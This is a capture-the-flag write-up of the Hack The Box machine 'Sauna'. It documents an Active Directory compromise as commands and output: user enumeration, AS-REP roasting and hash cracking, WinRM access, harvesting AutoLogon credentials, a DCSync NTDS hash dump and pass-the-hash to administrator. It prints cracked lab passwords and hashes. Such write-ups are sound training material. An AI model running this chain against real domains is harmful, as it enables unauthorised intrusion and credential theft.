HTB - Sauna

Enumeration

---

Scope

IP Address: 10.10.10.175

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ nmap -p- --min-rate 10000 $ip -Pn

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
636/tcp  open  ldapssl          syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack
9389/tcp open  adws             syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-07 17:57:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-07T17:57:54
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m06s

* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP Open ports: 53 - 123 - 389
* Services: DNS - HTTP - KERBEROS - LDAP - SMB - winRM - NTP
* Versions: IIS httpd 10.0
* Important Notes: EGOTISTICAL-BANK.LOCAL

Enumeration

DNS

Tried zone transfer

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ dig axfr EGOTISTICAL-BANK.LOCAL @$ip                       

; <<>> DiG 9.19.19-1-Debian <<>> axfr EGOTISTICAL-BANK.LOCAL @10.10.10.175
;; global options: +cmd
; Transfer failed.

SMB

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ smbclient -N -L //$ip                       
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                      

SMB   10.10.10.175    445    SAUNA    [+] EGOTISTICAL-BANK.LOCAL\: 
SMB   10.10.10.175    445    SAUNA    [-] Error enumerating shares: STATUS_ACCESS_DENIED

RPC

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

Kerberos

I always try to enumerate usernames if AD exits on the machine

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ kerbrute userenum --dc $ip -d EGOTISTICAL-BANK.LOCAL -t 100 -o users.list /usr/share/seclists/Usernames/jsmith.txt   

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/07/24 - Ronnie Flathers @ropnop

2024/07/07 07:05:40 >  Using KDC(s):
2024/07/07 07:05:40 >   10.10.10.175:88

2024/07/07 07:05:41 >  [+] VALID USERNAME:       hsmith@EGOTISTICAL-BANK.LOCAL
2024/07/07 07:05:41 >  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL

we got two valid users, I will try ASREPRoasting attack against the two users

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/hsmith -dc-ip $ip -no-pass -request -format hashcat
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting TGT for hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip $ip -no-pass -request -format hashcat
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e94ba92c6e2e5a56c63f6b44b33a7c18$934054420861aec52953b27db93df6188a5c39dac8d5dfcc2c00c40ca44a51e1b6467940418ab567b70dfdc96e66d4c8a3aeb6288361fc6a1b084a8ebc84fcd8c47b6efb23d72ec2464cff922ebf0e1c41ee3226792b828fc81a95f0aae684628ee411817092145b0afd755de3f4c1d548b04b2600ea07ce28ad9fdb941003bdfa158a25018bbef9202a802836244354b746c6fd6f03b94330ca94a0385f3fede5f67c3278d4f550c76c81d1dadc56402a7b592af9ace3cf31b9414f189e4aba55e3808193ebb38a47908fa6766e3933c0dd97009a1ea098f6e2b67d4a51a20b191b64bee6d2403a4b211c3fe748e8bc6475a7ef7bcecb6b79a3155dc02e1bf0

Initial Access

---

we got a hit with one user, then will try to crack it with hashcat

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e94ba92c6e2e5a56c63f6b44b33a7c18$934054420861aec52953b27db93df6188a5c39dac8d5dfcc2c00c40ca44a51e1b6467940418ab567b70dfdc96e66d4c8a3aeb6288361fc6a1b084a8ebc84fcd8c47b6efb23d72ec2464cff922ebf0e1c41ee3226792b828fc81a95f0aae684628ee411817092145b0afd755de3f4c1d548b04b2600ea07ce28ad9fdb941003bdfa158a25018bbef9202a802836244354b746c6fd6f03b94330ca94a0385f3fede5f67c3278d4f550c76c81d1dadc56402a7b592af9ace3cf31b9414f189e4aba55e3808193ebb38a47908fa6766e3933c0dd97009a1ea098f6e2b67d4a51a20b191b64bee6d2403a4b211c3fe748e8bc6475a7ef7bcecb6b79a3155dc02e1bf0:Thestrokes23

Session..........: hashcat
Status...........: Cracked

And successful :)

I will try to connect to SMB & winRM with the credentials found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u 'fsmith'  -p 'Thestrokes23'         

SMB   10.10.10.175   445  SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec winrm $ip -u 'fsmith'  -p 'Thestrokes23'

WINRM  10.10.10.175 5985 SAUNA  [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ evil-winrm -i $ip -u fsmith -p 'Thestrokes23' 

*Evil-WinRM* PS C:\Users\FSmith> type Desktop\user.txt
a0865592caf1d5a2d07d1183aa080f0f

User Flag: a0865592caf1d5a2d07d1183aa080f0f

---

Privilege Escalation

After obtaining valid credentials, I hurry to bloodhound to enumerate the domain, but before that I updated /etc/hosts to contain the following record

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ tail -n1 /etc/hosts
10.10.10.175 EGOTISTICAL-BANK.LOCAL SAUNA.EGOTISTICAL-BANK.LOCAL

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ bloodhound-python -u 'fsmith' -p 'Thestrokes23' -ns $ip -d EGOTISTICAL-BANK.LOCAL -c all
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: **Connecting** to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL

Creating a .zip file to upload to bloodhound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ zip sauna.zip *.json

Opening bloodhound with the following commands

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ sudo neo4j start
[sudo] password for kali:                                                                              
<snip>
Started neo4j (pid:18524). It is available at http://localhost:7474  

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ bloodhound

Upload the zip file we created before and began to enumerate the domain

When I clicked List all kerberoatable Accounts I found hsmith listed, So I will request its TGS and try to crack it

I've done this attack, but it didn't reveal anything and hsmith had the same password as fsmith and didn't have any privileges we were looking for.

*Evil-WinRM* PS C:\Users> ls

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr

There is another user on that machine called svc_loanmgr and after looking for it in bloodhound, I realized that I could perform DCSync attack if I had this account.

I moved winpeas.exe to the current folder and uploaded it via evil-winrm = to the machine and run it

*Evil-WinRM* PS C:\Tools> upload winpeas.exe
*Evil-WinRM* PS C:\Tools> .\winpeas.exe

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials                                                                                         
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

We got svc_loanmgr passwords, Let's perform DCSync attack from Linux attack box

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u svc_loanmgr -p 'Moneymakestheworldgoround!' --ntds 
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! 
SMB         10.10.10.175    445    SAUNA            [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         10.10.10.175    445    SAUNA            [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.175    445    SAUNA            Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70xxxxxxxxxxxe:::
SMB         10.10.10.175    445    SAUNA            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.175    445    SAUNA            krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
SMB         10.10.10.175    445    SAUNA            EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB         10.10.10.175    445    SAUNA            EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB         10.10.10.175    445    SAUNA            EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SMB         10.10.10.175    445    SAUNA            SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:21505d6dd773d86031623f0b8e8c98ab:::
SMB         10.10.10.175    445    SAUNA            [+] Dumped 7 NTDS hashes to /home/kali/.cme/logs/SAUNA_10.10.10.175_2024-07-07_081911.ntds of which 6 were added to the database

Login as administrator using impacket-psexec

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-psexec EGOTISTICAL-BANK.LOCAL/administrator@$ip -hashes :823452073d75b9d1cf70xxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file dPcptKVP.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service tQAK on 10.10.10.175.....
[*] Starting service tQAK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

C:\Windows\system32> cd C:\users\administrator\desktop
C:\Users\Administrator\Desktop> type root.txt
b9955377f34c4330d2f5xxxxxxxxxxxxxxx

Root Flag: b9955377f34c4330d2f5xxxxxxxxxxxxxxx